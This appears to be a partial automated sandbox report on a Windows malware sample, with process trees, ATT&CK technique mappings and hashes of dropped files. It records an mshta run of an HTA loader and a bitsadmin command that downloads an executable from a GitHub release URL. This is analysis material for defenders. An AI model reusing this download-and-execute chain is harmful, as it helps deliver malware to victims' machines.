C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1840 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:8
10⤵
PID:6140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1660 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:8
10⤵
PID:3060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2832 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:1
10⤵
PID:5592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2852 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:1
10⤵
PID:6060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4212 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:1
10⤵
PID:5736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4436 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:8
10⤵
PID:5720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4592 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:8
10⤵
PID:644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4492 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:8
10⤵
PID:5872

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\LXLoader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
8⤵
PID:4420

C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://objects.githubusercontent.com/github-production-release-asset-2e65be/800426404/c15bbce8-4a31-4cc5-9245-05a9cd344f58?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240606%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240606T121036Z&X-Amz-Expires=300&X-Amz-Signature=7701bb5d03d0ca82630dfde501713c8a5abac251571ebd4afb3bd2c2a31bddf2&X-Amz-SignedHeaders=host&actor_id=81531607&key_id=0&repo_id=800426404&response-content-disposition=attachment%3B%20filename%3DLXLauncher.exe&response-content-type=application%2Foctet-stream C:\Users\Admin\AppData\Local\Temp\LXLauncher.exe
9⤵
- Download via BitsAdmin
PID:1636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3296 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:2
3⤵
PID:5952

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:2596

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:2372

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4028

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:2684

C:\Windows\system32\ctfmon.exe
ctfmon.exe
1⤵
PID:6088

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3912

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5020

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

BITS Jobs

T1197

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

BITS Jobs

T1197

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\11e5ca82-cb0b-48e6-ac4e-645b2a369a82.tmp
Filesize
6KB

MD5
191c5c7d4c3b61f1dbeaf6365460c074

SHA1
3c8aaec27fe3b8831995eae28e9c4f9aecc588d9

SHA256
785dcd24381a71b7605d6308fa7b689280367e2e24f8e5202f1aa02ebc0d907a

SHA512
a4ffec45800ff3b3f28ae5af875bc0935342db367679da103d7c0bc1adab6f746ef8f78805c30a6a0fc117b7dec5300dbb99c3a192216048aaa2d4880cf391b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_000037
Filesize
27KB

MD5
97f07e182259f3e5f7cf67865bb1d8f0

SHA1
78c49303cb2a9121087a45770389ca1da03cbcdf

SHA256
c3a70f23a2cf331852a818d3f2a0cf7f048753c9b47aa4e7f0fee234c46b226c

SHA512
10056ad3a71ee806a8d8aff04d513a079568bf11799016f76f27c4255be2141a4c2d99c1f46bbfde9c99ba0f8b44e780a92b59f514d3cc1c248ead915c31b5dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
672B

MD5
92145718be1aaeebfa6fce71e316b54a

SHA1
764e5d54ab47039f2a000bb7a828f69e4e31c76f

SHA256
b3a44d95668ad4c9849252eb376b3f769b3e2cf373f3252348f349a1a42c3917

SHA512
f5621c19e617f609f1ec5a4041c5b13f79671ffa5f1c1ded99105e1152a8296c3111f49629ebe73186ef91d0fa0884e05c29ed6e177a6108dd39ed8ad641ea0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index~RFe5a5361.TMP
Filesize
288B

MD5
9e7d46cfccbf308a97d9a086f24eb95a

SHA1
a0685ef0bab4a10e07fb2d798dd69d88337fc635

SHA256
2f220847c945b78102bbe959571dc8ee5b1ffd5c6de9ad66bbd61bd695d34f76

SHA512
732c807dfca02d80bb239c250bb3b84dec692f47f01a0ebaee0f7dbf037038ffd679d633881fde2aa4c73462d231026ed4756de8541b23440ec3caf9ed86dccf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Network Persistent State
Filesize
3KB

MD5
46998a57274381b4ad672b1003cc3168

SHA1
0313a8e8e6acf18a6c2c6be63361bb9f916988a4

SHA256
e0338914e4c965c58526431b55db9537eff938aadb051af0b8000b6f84a644a0

SHA512
6fe9eb99bb3c289492bf142b40367699e8c9e5ddd86ac2cd256d1c9e45ee4b56fd7c5f8689342ede1ed05c1258567e8714dc6439c20333a739127e7eb6631cd6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Network Persistent State
Filesize
4KB

MD5
df6d27558789eee9e5ec6083387963d7

SHA1
f2b09d123d9be9734221b9ada668235ca76184c3

SHA256
24340df0d27b548827f022b2e7f7aa39c16b68310bebbed7a715f1051f202e44

SHA512
e18de868b01981c854d6ec69d79763fe4bfe0c45d42935ea977b8625036f5a7c9a7989ca0be186d8efaa7c4d8fabdde545cc305c82b5388e636fec34df040a37

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Network Persistent State
Filesize
3KB

MD5
792b5f0154e2aeb88dfa9fd04e4efc6f

SHA1
91df5e5f15b2fb8ef7f256fb5187e7a8377bf2d8

SHA256
561137b78819ce9718465999b3d31c746a5d0e126a3a7eb15b259bb46decd0b2

SHA512
b5526476fb946bede4ac20ec5e541fb73ddb94471ff52f687e753c20ce82125e42170fcb1c116bd8e9677e8db7c5cfb886c789b7f4ae76d6c0ee5c6b2fe63f92

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
329625914ced1758bcbb2d9ac5bc68a8

SHA1
a46dc7ee18ace5dab9b3743d47831e6efe96e607

SHA256
32a58e9b35236575d49a842279beb80745e040c10843639790873c4ba82647b8

SHA512
2886f49d07de3d8e3ca271c15f58e5b5164ea5601d50675df3fcf144c6002ad4525c4d7cd41971b166e261ceaab3ebd21b873f976657fff32a7adaa9c8a7abc6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences
Filesize
6KB

MD5
3150ea316f51fe3a1ed09e26aeb96421

SHA1
4ae2e564c8add4c7bd78d428ea3a8b526cb43a87

SHA256
7e99eb2c17a4aa26c70f90e418d384430588fe8c96c02ec5a9b6bfc31bb7e760

SHA512
225c70f9b38e7251f0b9e5ed6ff747050d855545b97bf8f28fbb542d238ca71ff392889267c3a64461a5732c8cd39c3fa3459f4951285495093dca90806da035

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Session Storage\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Session Storage\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\f1f66774-75a9-439f-a736-ac93cf71c620.tmp
Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State
Filesize
280KB

MD5
4758cae91888a6fa5461f9c0fde2c0b8

SHA1
07d9421dae068592fdd45e5d0caea442396835a6

SHA256
c11e6b1bcd9f2bb2bfdc689cd164a1a0ff587ee8ea9e25411e563e6ee49d4abb

SHA512
2cd8bed4f82a9648ec7136190c8e6431e5a23727ef485ae5f04f85a49aac03099a62034a259946b31a17c150444b4f6578e67584db752e6632943142031b3651

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State
Filesize
280KB

MD5
01c512f5dc79a863e2d96d53d9ffb729

SHA1
fd93d5d7fc8d827541235a121351bd016d3117a2

SHA256
498eb80c16c268cc9827509ce8ae3d63651a7c7f98bb446ec524a7fbf5eb924b

SHA512
f10db0f4b90e4ba2f8473ec7b7ec2f04916c785d5894858053f2982a207bf1fe3c21494644cccd0e06dca8a1f20840f5c3f617442615b46612845ca3562319ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Module Info Cache
Filesize
107KB

MD5
10486d34c4241fdf80a9a79e60af77ec

SHA1
303593cce29b0bd50b876a25c1773ee908b2b826

SHA256
ad4b10dc105ac24a07e0e18e8f2df7065bb9515f5c099e822f9acfcc37d681b9

SHA512
ce25284045ef83d75b40e5bbcd74edd3247f80bb742919505bebdf34d0f918ecd0e9adb761877a4f647e6ba6168b8b2ea40ae9c37acc8683836d9ecceafebfdc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\ShaderCache\data_1
Filesize
264KB

MD5
67395b9a96a44f6495a2b175b5f1ac57

SHA1
ef5bca7d1f4b42f67a456f460c7ee317a98a8361

SHA256
1e4e706d062b046a936c77611425823d7ab8674051469c9517b4931d6cba6784

SHA512
53fba6d7f80057d270557464fae6bba3d755617673b85ab374c5b9fbe9f3b18564233d5b3c6cdf2f488f8653936934b62603533beb70710cda883961b9ab2adc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
2d9f034fe011a3626c641622da4e1fe2

SHA1
e79ffce5333c61d94a36ccaf9cf1a72e03268656

SHA256
34b2d6b896be4a5c8771e65da5d9342ef5f69880e9948b6a9522c06ca50efc00

SHA512
703dae4d2a4f7ece62ef72c964d232b229964ca84638c916804a983bab85c5da30a2af269359261c3044a56e362341f442e0137eeef6f82ddb4fc97b358fd580

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0
Filesize
44KB

MD5
a8499d786aa8a6a1cc9da9e6220ada17

SHA1
067633b9413817ff754c2af6a8a7ccc41517b18e

SHA256
4435a448e3db09abc722b709c96dd2d81f082c263e9b664c439a06ac6432fb0e

SHA512
ad0c181a184dac34ba9c38f9f407ed6e485fac7470fb278c0ba0cb85c812d3bada1fe864f80770a70155b982050a0fd9c5e68c0834df1777c307f4bd0554c5a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1
Filesize
264KB

MD5
a67b7d1e5cc26add8e82d6214dd90144

SHA1
65fae9a5955e87c9570ed450ebd72c890aadda8a

SHA256
a67df115a3efb85f4d06838cba4ea866834346f6f12154f934abacef4557de3f

SHA512
833d46043482f81eb85c45d5e216ef194abea17d9f246a930b7af606906c1588ab56052929f2819b45a9412902dfc1bc33c69f8757d18399fa9db01e9bb1ef43

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2
Filesize
1.0MB

MD5
848d083e8256b2278cb678734349fb63

SHA1
59060efe2a2199b6bf4330a7f7c98b9e6450d49a

SHA256
444fd90b9b43956795558644ef627d2b00e9fda72eb347b084503a8f0896501e

SHA512
97cd6f15ceaecb337c50cb133c31a33f2db8ca19dddba97c67e8a701d545158a74bc1e8c40c475c09e6b109b2b451e6e902a8d2e5f224c7accf606cbcd8a768f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3
Filesize
4.0MB

MD5
ee2f74b6e49c9797b5465296a0651e8a

SHA1
a2e35f580219e78db309f090e3b6fc39243c20bb

SHA256
fd484c41b2b7aa5ed12cb160b65c34d6c52321ac5d35d3863c633e16b3925f20

SHA512
aa9ba173a2ff2e3026f463f3b11daa742fc4eda81eecf25a683b6c7cad1c522a100c9cc5221c70b5a160f411145947504bb6d1ad52c676e0503d5c82d4419d06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001
Filesize
36KB

MD5
6e0dfe11e95944da94e70a99c169c81e

SHA1
f8cd534a059869e65a5e800ed4ff693539c7bd65

SHA256
72863be7491063b6198044605fae19e03c2bf5ca0f3282dcba49e0adff86b900

SHA512
f51ddb326f3fd0b898f29b0759b0f40d1490af0e374b50a323523ddbbb8336c08e832992274a45610bc09361f2883f8f95c67c29d5a9bc7b4a77d18e100913d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002
Filesize
27KB

MD5
ba77edb25c67040b1961099f0dfaaaf3

SHA1
84d9ab804b43e8dba35e7329bd53f04216bf4017

SHA256
75afaf1bb05f94df47802c73de396234f07d508d33fc33afbb0ddae235a29706

SHA512
02b4b9ba243b8f89947e7f13b0619142d78ec337f9ffe5958ae7a1cca4a3ddbe837d5519a7c8f85aa2d0235b5832ffa9bdf33fd17dcd47feabb0ab272de6fb2e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000003
Filesize
16KB

MD5
5bb848123396170c4b5ccb9f1148a2a6

SHA1
0178442b22482efc1d7018284b4b18ddfff9f948

SHA256
08ccf9d267093d4e59a5a5633e2019dfe70e001088143fedbf1f02c74849db60

SHA512
e2d78eb5f2950dd2214b27abc2600ae97dfb3a3133d5cf6ffb49a26493fc77047a37a988248113c19af70a77a1727dcd053e3a1572029cc418df1db560831852

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000004
Filesize
39KB

MD5
2b0137600fdc5875830b51a9ad6e8256

SHA1
20c6bd524096c9e8672a6c570cb1273ac6a7e18e

SHA256
81e8d0bbbe902acbc02b695d1e68d327431a5f34f1beb99585d6a277acb78546

SHA512
643b5d6ef6083e4fd71928b8f4132657b55a39d3f386058dd3538634ff2afc69932636ef3fd825446c30af6fc4a3006c9ef1a15c2f1a3451df146325a1e69c9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
Filesize
80KB

MD5
c07e058ba0a0c6a179a791870baff7d8

SHA1
ed7f77508ae64ae30979a22be039881391eb5e5a

SHA256
8552f049ba68d96f341f68e95e2d28ddd50a68fab0dda76d361ad3a52460d6ee

SHA512
ea3e40878fec6f595e17c5d37e9094bb0cbaca60e00caf0d843ef3429cd59cc69f5f5e852020f5b599151fd2f7cd6468c18bfed94737ed7634a2cdd2f641f492

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
Filesize
52KB

MD5
9c06450d5a45b9395752070ccc2a458a

SHA1
9de706cc74d4f1e82a40bc7bb46f5dcefe4423f1

SHA256
4eeb7d70969bb256e08681686107b751582fb189e5215a8cd40978a3357651e8

SHA512
6b71b48281970a10866df61841c8a1d363621f5cf21d6da20de4f15a6c666d98529662885ef76e36af177ea7a94bbd5697d43d2719e178e5688dbee90a8e0498

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
Filesize
118KB

MD5
7f477633ddd12f84284654f2a2e89b8a

SHA1
17dad0776899ad1beadabd061c34e2a22b2cde74

SHA256
966620f9e3bec428663687f9e8d67a6b8e35d79adebf6fb204e9b139eada7599

SHA512
b46baa2a3ea38512f8b539774c751004cc866d085a9739f4c25f2ade9d97c10d6f4b20cf87dcbb6a003e0df0ca2df200f9036a4c76a013f24c57d365981f6e00

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\26371fb7c19c3182_0
Filesize
202B

MD5
feee83629cd872056ec85bdd55f4806a

SHA1
322dcd2f9c4baee3496b5bca0be101126defda1a

SHA256
5c0560980674a8d521919402f0271dcb4080f355ea1130015e4c1df97aba72a6

SHA512
1ed682de00fc96730f1b004b9acded15c07648e06d337944960d4620dfcd449f3395475a91c5ee26947fafc45928081a8548a98956bf26671f54e41776876636

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\34290d35831b089b_0
Filesize
198B

MD5
f6f6e77b5d18a0b3b6c6b5855dd605f6

SHA1
9563c1a362d9ed7e73b1db7c378c95d5bc93f1d8

SHA256
ce6a1c693942efdcf921efed1b83572efcf6b23442289d4819026086d7528eec

SHA512
c9bd43fd2ec40b8e199f80815ecc85dfa8846395df9008018916aaffd1f1c9bcbf92d6b0d05bd314b044cc711ec92b43938b31e4feaa79db066306d8d56aba2c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\39f96b3b6c866ca9_0
Filesize
195B

MD5
1f37c30ea273e20cb1406327e6d28cf0

SHA1
38ac0f2e855e42fbea850080cfa4ef1ee543b0f3

SHA256
bb57af6adfd4fe23b150e9e08a56ac7985fe7a84d339effc2b3eb60f4591d800

SHA512
08ff448a264ad9d104f120e67b0915d2fac9630665741944a7d2d6b54e74ae22e6e79dea7139af9dbcfcc6ca88fb80ce5314fb8f931995378da7ed8607e04306

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\7e6d2d5eecfa425a_0
Filesize
189B

MD5
8f814c650c29832e175a817fa9854ae0

SHA1
b4c61c1545da8ad02740746281cbe435cd5ad752

SHA256
79647a28325c24013ecd456e79f691469556b00cc155ba625ed1b943d3799434

SHA512
98bdaaa864591dd1b1001661bf8015116f3330fd330a1e6e7bab6e05bea0ffd5cb4dc52a629afda9ac0fb0633ba5a6d00d6520a4914ebd42f0de23d2d7a3bef5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\94747ab307782860_0
Filesize
195B

MD5
dc293f32385c5458c7f94e80f7de87ba

SHA1
5bb1a7094560fc981d24b85d7fd1fc5d97287b22

SHA256
5d06262b24c6152ec5106a10aeffce30adb61dbc54af5c82ba8d6beb727dd03d

SHA512
8982b3d45db33b352b03d2061273ae135a3b4d3642f1615366d77c3862b29c6be54b185a9940eec2d9cc1f96ec899798d9927b4779bcf0c3f22b1eb82ccbf860

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\9ca46050a515f8a9_0
Filesize
205B

MD5
f0d2a94f27ca3f5e41cac2052129353d

SHA1
3843dcad7952e11464738a0bb6fe2882b27238aa

SHA256
aa0b752f75860156b981385db19a73799d6c0dda7bef9d95604bba96cd52de00

SHA512
01af980c1d48c03e444667c74c421a51c39ebfd193bc042074bfbe1472105e2243053f4778865d4b75f1986c7b788019df38a2da97e7ed22250d3d343e394b03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\ab39e0f6dcb04927_0
Filesize
190B

MD5
7247cb1a87d9e2145e7db71f94bb04ea

SHA1
1f54f8447932e86306ea9eab26459618bb4dc3a9

SHA256
a6f9cfdb762965e69476d7fa46a16ae8877ea3668cdaf04bfe89f4ced24336bd

SHA512
4afc3d319f64d1f615e192bba32b2d66ec5f9440ffb36a33bb211bbb4a3c945049dbfa66833499839bcf09f958c0d2e8f0af26987c9385303e27033432146065

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\cd1687d7f5324478_0
Filesize
194B

MD5
236b0503df40be82d03e35838b2f6b09

SHA1
f9eaffd0d9c34b8f71241423a7ece12858718be6

SHA256
fd0193ab16b2e7aa79dbe7f8d73135dc4eb7712d2b9b37392b9cb7e9586fc88c

SHA512
c13c94d94e73d46980c15c40fd1f22d936292ded27782ff927f6448c68161b82c87cedb3edd4682de1a958f8c02a67b82edbf4b92268ed3fa2f910cae99a7d86

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\e4fbbdc312bd656c_0
Filesize
188B

MD5
0cb6ce8a51f8f4b59c58f4bf67a56cd8

SHA1
32d3d09caef29c5ec6d0686a1c26f2c4a7c45202

SHA256
68a23dcfd9a671e0233a742ed3e01fc1d02da2b5befa53e699f7a7ee58baaafb

SHA512
a1c12fdc35d43cf92de8a5fb9c5c143cc3ccc84bce66db9e66c17ef512c5c5cd730d406baa2457b6f099332b310837f5a4542ad3886872827f5ae0b004e884d2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f08c11276c2d9f59_0
Filesize
195B

MD5
4118d608bedb76fdb7084bb249112b26

SHA1
5d219549bbe4c20a9c1d527db367e4058c417b6d

SHA256
112af364c61bcaea868836619a4739cbc251ab26f524339907ab1cdf58fc6863

SHA512
212e54f0b3b75f5c0b06c6bb7e6272332a0cea1876314601309227816ba1ef6ed736dd141f5c600802f75002ca8747f2a94ccbbd1994eb7322a4d61c15e97424

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
288B

MD5
1117e2bae8b28b3a4fcb062901ed4ba2

SHA1
0eed73413bfc7b959ab0260f8fd58549d6ae5473

SHA256
a13e104fda44c0b60458b087aa13fa750eba678b5e0969f4462df7c2f06c142d

SHA512
81eb73992f3cb24f862976b7b1f42b5716bf85f758d2d329cba1d3b8df9db8411c4bd810c6d4ba0d54816cf27f9ecfa57da3586d5dc0db69d2bfa047eddaa177

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Favicons
Filesize
20KB

MD5
ed578102595d5f83cda5a31c32537512

SHA1
2acb025825de1152c68c05e1d34a4da8fe1bbcbe

SHA256
40e5789eab9291240eaf65dd1d76cf6ce9e2b07b1b211e391fc2e45ce5d4b6b0

SHA512
a37aa29b5f0ec2f203a4e0a6bbacb3d1c9235a3272a629e720821731f14425f4a61a5b418cbaee6c2a6fa9c88b48f1e7da30bf03419bbfe6c5416e28ee56cd03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
Filesize
148KB

MD5
f1dac1729300562592cf6336efba0597

SHA1
6715008e409cdbcfccd946d83f4ac79e47ba3d91

SHA256
ee93fd06249c9ab56ba56ae1363c5faba5d51d1a5e0379d94e231942779fae00

SHA512
2586254bf0206adcd6b5c3f95807785a78c616e9f77d3910beb31ef3b3f6f0f2ce30fef37baf5c687483e5d00dab729d0879094404da4e5f1a7aae3e9f03a1d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History-journal
Filesize
8KB

MD5
a55158bafebd8a03cceab6473fb2aa89

SHA1
c6e7998ce21a8d6144424cb4ac446837f79db70b

SHA256
5a372f71025a7f94a970935abb7ff19d09644d54d1c72ce1d742497c4431a5d1

SHA512
11e52b728856a39e2906143f55ff3a27e74dad777b6e6264abe222bd0b43f2bd06125693d1dff2e7ee855490fc412c579c07ddd6b97b41c9fe3a3abe018c8e4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
898B

MD5
72067dfa3b7a0291e89f5ba9aef2cdcc

SHA1
929ea99d55cc9e7ec356320062cd1c2e76848eb0

SHA256
ba54c381242493236cc5b35988d2df66a4ca827ee30d0f93b0ae9e59af4585d7

SHA512
